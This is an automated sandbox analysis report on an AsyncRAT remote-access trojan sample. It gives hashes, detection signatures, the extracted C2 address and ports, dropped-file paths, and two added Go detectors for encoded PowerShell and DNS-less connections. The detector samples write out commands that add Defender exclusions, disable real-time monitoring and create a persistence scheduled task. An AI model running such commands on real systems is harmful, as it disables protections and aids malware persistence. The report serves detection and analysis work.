Windows Analysis Report
PXUVmodpCYqRIPQ.exe

Overview

General Information

Sample name: PXUVmodpCYqRIPQ.exe
Analysis ID: 1606870
MD5: b12869ee25cc50e4ebb7c66fd75b7b35
SHA1: 765488b8536cd89a7bd8ef0100ef97e9d7014c34
SHA256: 5a283f2f193bd78816d21cc62d0bb67a5570bc631f5c3752444abc28515e542c
Tags: exe user-malrpt

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected AsyncRAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match
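Several of the signatures above are Sigma hits on process command lines: "Powershell Base64 Encoded MpPreference Cmdlet", "Powershell Defender Exclusion" and "Suspicious Schtasks From Env Var Folder" describe a PowerShell call that adds a Defender exclusion (here hidden behind -EncodedCommand) and a scheduled task whose action lives under an environment-variable folder. The Go program below is an added example, not code from this report or from any Sigma rule, that runs equivalent checks over constructed process-creation command lines. It decodes the -EncodedCommand argument (base64 of the script as UTF-16LE) before matching, rather than matching base64 substrings, so the decoded cmdlet and its parameters are available for the alert. The sample command lines, the Taskshell task name and the paths in them are constructed for the example.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"unicode/utf16"
)

// Finding names the rule that fired and the command text it matched (decoded when encoded).
type Finding struct {
	Rule    string
	Command string
}

var (
	// PowerShell accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -enc, ...
	encodedFlag     = regexp.MustCompile(`(?i)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})`)
	mpPrefCmdlet    = regexp.MustCompile(`(?i)\b(?:Add|Set)-MpPreference\b`)
	mpPrefDangerous = regexp.MustCompile(`(?i)-(?:Exclusion(?:Path|Process|Extension)|Disable\w+)`)
	schtasksCreate  = regexp.MustCompile(`(?i)\bschtasks(?:\.exe)?\b.*\s/create\b`)
	envVarFolder    = regexp.MustCompile(`(?i)(?:%(?:AppData|LocalAppData|Temp|Tmp)%|\\AppData\\|\\Temp\\)`)
)

// encodeCommand builds what PowerShell expects after -EncodedCommand (base64 of UTF-16LE).
// It exists only to construct sample input for this example.
func encodeCommand(script string) string {
	u := utf16.Encode([]rune(script))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		raw[2*i], raw[2*i+1] = byte(c), byte(c>>8)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

// Constructed process command lines; none of these are taken from the report.
var sampleEvents = []string{
	`powershell.exe -NoProfile -WindowStyle Hidden -enc ` +
		encodeCommand(`Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming"`),
	`powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"`,
	`schtasks.exe /create /f /sc minute /mo 1 /tn "Taskshell" /tr "%AppData%\Taskshell.exe"`,
	`powershell.exe -EncodedCommand ` + encodeCommand(`Get-Date | Out-File C:\Temp\log.txt`), // benign
}

// decodeEncodedCommand returns the UTF-16LE script behind -EncodedCommand, if present and valid.
func decodeEncodedCommand(cmdline string) (string, bool) {
	m := encodedFlag.FindStringSubmatch(cmdline)
	if m == nil {
		return "", false
	}
	raw, err := base64.StdEncoding.DecodeString(m[1])
	if err != nil || len(raw)%2 != 0 {
		return "", false
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u)), true
}

// inspect applies the three checks to one command line, matching on decoded text when encoded.
func inspect(cmdline string) []Finding {
	text, encoded := decodeEncodedCommand(cmdline)
	if !encoded {
		text = cmdline
	}
	var out []Finding
	if mpPrefCmdlet.MatchString(text) && mpPrefDangerous.MatchString(text) {
		rule := "Powershell Defender Exclusion"
		if encoded {
			rule = "Powershell Base64 Encoded MpPreference Cmdlet"
		}
		out = append(out, Finding{Rule: rule, Command: text})
	}
	if schtasksCreate.MatchString(text) && envVarFolder.MatchString(text) {
		out = append(out, Finding{Rule: "Suspicious Schtasks From Env Var Folder", Command: text})
	}
	return out
}

func main() {
	for _, ev := range sampleEvents {
		for _, f := range inspect(ev) {
			fmt.Printf("[%s] %s\n", f.Rule, f.Command)
		}
	}
}
```

Decoding before matching also catches the obfuscated launchers flagged above (Invoke-Obfuscation CLIP+/VAR+), since the decoded text is what eventually reaches the cmdlet; the trade-off is that a command line whose base64 is split or truncated by the logging layer will not decode, so a raw-substring rule is still worth keeping alongside this one.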

Classification

Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure, encrypted connection. It is an open-source remote administration tool, but it is also used maliciously because it provides a keylogger, remote desktop control and many other functions that can harm the victim's computer. AsyncRAT is delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

AV Detection

Source: 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"Server": ["192.3.189.150"], "Ports": ["6606", "7707", "8808"], "Certificate": "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"}
Source: C:\Users\user\AppData\Roaming\Taskshell.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Virustotal: Detection: 52%
Source: PXUVmodpCYqRIPQ.exe ReversingLabs: Detection: 60%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Joe Sandbox ML: detected
Source: PXUVmodpCYqRIPQ.exe Joe Sandbox ML: detected
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: 6606,7707,8808
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: 192.3.189.150
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: 0.5.8
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: true
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: k5CBmR5JDsDg
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: 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
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: 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
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: false
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: null
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: false
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: Default
Source: PXUVmodpCYqRIPQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PXUVmodpCYqRIPQ.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 4x nop then jmp 03189F7Ah 0_2_03189996
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 4x nop then jmp 0B19925Bh 10_2_0B198C76
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 4x nop then jmp 026F9533h 21_2_026F8F4E
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 4x nop then jmp 0145925Bh 33_2_01458C76
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 4x nop then jmp 0791925Bh 37_2_07918C76

Networking

Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 192.3.189.150:8808 -> 192.168.2.4:49740
Source: Network traffic Suricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 192.3.189.150:8808 -> 192.168.2.4:49740
Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 192.3.189.150:8808 -> 192.168.2.4:49740
Source: Network traffic Suricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 192.3.189.150:8808 -> 192.168.2.4:49740
Source: Yara match File source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150 (50 such connections)
Source: xcsUjVN.exe, 00000014.00000002.2949551104.00000000014B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: xcsUjVN.exe, 00000014.00000002.2949551104.00000000014B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp, PXUVmodpCYqRIPQ.exe, 00000009.00000002.1793564770.000000000314C000.00000004.00000800.00020000.00000000.sdmp, xcsUjVN.exe, 0000000A.00000002.1858382198.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, xcsUjVN.exe, 00000014.00000002.2954261509.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, xcsUjVN.exe, 00000014.00000002.2954261509.0000000003491000.00000004.00000800.00020000.00000000.sdmp, Taskshell.exe, 00000015.00000002.1918167976.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, Taskshell.exe, 00000021.00000002.2026862188.000000000314A000.00000004.00000800.00020000.00000000.sdmp, Taskshell.exe, 00000025.00000002.2090225147.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
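The "TCP traffic detected without corresponding DNS query" entries above apply a simple heuristic that is worth having in any network telemetry pipeline: a public destination that no DNS answer in the capture produced is either hard-coded in the client, as the 192.3.189.150 C2 address in this sample's configuration is, or resolved out of band. The Go program below is an added example, not code from this report or from Joe Sandbox, that runs the heuristic over constructed Zeek-style DNS answers and connection records; the 203.0.113.10 answer is a documentation-range stand-in and the record set is invented for the example. It ignores private, loopback, link-local and multicast destinations, and it counts repeats instead of re-alerting, which is what turns the 50 identical entries above into one line with a count.

```go
package main

import (
	"fmt"
	"net"
	"sort"
)

// Constructed records in the shape of Zeek dns.log answers and conn.log rows (not from this report).
type dnsRecord struct{ Query, Answer string }
type connRecord struct {
	Src, Dst string
	DstPort  int
}

var dnsLog = []dnsRecord{
	{"ctldl.windowsupdate.com", "203.0.113.10"}, // documentation-range stand-in for the real answer
}

var connLog = []connRecord{
	{"192.168.2.4", "203.0.113.10", 80},    // resolved first: ordinary
	{"192.168.2.4", "192.168.2.1", 53},     // private destination: out of scope
	{"192.168.2.4", "192.3.189.150", 6606}, // never resolved: hard-coded C2
	{"192.168.2.4", "192.3.189.150", 8808},
	{"192.168.2.4", "192.3.189.150", 8808}, // reconnect: counted, not re-alerted
}

// Alert is one public destination reached without any preceding DNS answer for it.
type Alert struct {
	Dst   string
	Port  int
	Count int
}

func isLocal(ip net.IP) bool {
	return ip.IsPrivate() || ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsMulticast()
}

// connectionsWithoutDNS flags destinations present in conn records but absent from every DNS answer.
func connectionsWithoutDNS(dns []dnsRecord, conns []connRecord) []Alert {
	resolved := make(map[string]bool, len(dns))
	for _, r := range dns {
		resolved[r.Answer] = true
	}
	type key struct {
		dst  string
		port int
	}
	counts := map[key]int{}
	for _, c := range conns {
		ip := net.ParseIP(c.Dst)
		if ip == nil || isLocal(ip) || resolved[c.Dst] {
			continue
		}
		counts[key{c.Dst, c.DstPort}]++
	}
	out := make([]Alert, 0, len(counts))
	for k, n := range counts {
		out = append(out, Alert{Dst: k.dst, Port: k.port, Count: n})
	}
	sort.Slice(out, func(i, j int) bool {
		return out[i].Dst < out[j].Dst || (out[i].Dst == out[j].Dst && out[i].Port < out[j].Port)
	})
	return out
}

func main() {
	for _, a := range connectionsWithoutDNS(dnsLog, connLog) {
		fmt.Printf("no DNS answer for %s:%d (%d connections)\n", a.Dst, a.Port, a.Count)
	}
}
```

Treat the output as a triage signal rather than a verdict: names resolved before the capture started, DNS over HTTPS, and software that ships IP lists all produce the same pattern. It becomes convincing in combination with the kind of TLS evidence listed above (the JA3S and server-certificate rules that fired on 192.3.189.150:8808) or with the ports from an extracted configuration.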

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2954261509.000000000362D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2026862188.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1790797223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1858382198.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2090225147.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2954261509.0000000003491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1918167976.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PXUVmodpCYqRIPQ.exe PID: 6792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: PXUVmodpCYqRIPQ.exe PID: 7204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xcsUjVN.exe PID: 7268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xcsUjVN.exe PID: 7728, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Taskshell.exe PID: 7756, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Taskshell.exe PID: 3852, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Taskshell.exe PID: 7576, type: MEMORYSTR

System Summary

Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
